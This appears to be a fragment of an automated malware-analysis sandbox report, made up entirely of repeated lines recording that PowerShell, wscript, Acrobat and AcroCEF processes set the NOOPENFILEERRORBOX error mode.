              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
